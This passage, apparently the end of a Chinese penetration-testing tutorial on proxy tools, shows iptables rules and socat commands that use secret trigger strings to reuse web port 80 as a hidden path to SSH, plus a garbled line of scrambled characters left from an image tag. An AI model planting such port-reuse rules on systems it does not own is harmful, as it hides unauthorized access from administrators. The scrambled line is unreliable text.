iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name LETMEIN2 --remove -j ACCEPT

如果发现 SYN 包的来源 IP 处于 letmein2 列表中，将跳转到 LETMEIN2 链进行处 理，有效时间为 3600 秒

iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name LETMEIN2 --rsource -j LETMEIN2

121K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4z5q4)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8E0b7h3g2D9L8V1E0m8b7f1y4%4k6U0y4s2j5e0m8i4f1e0M7I4x3W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

开启复用，开启后本机到目标 80 端口的流量将转发至目标的 SSH

echo threathuntercoming | socat - tcp:192.168.3.128:80

关闭复用，关闭后，80 恢复正常

echo threathunterleaving | socat - tcp:192.168.3.128:80

总结

这篇文章几乎囊括了渗透测试中的所有主流代理软件，以及他们的详细用法和场景使用，书写不易，希望能帮到大家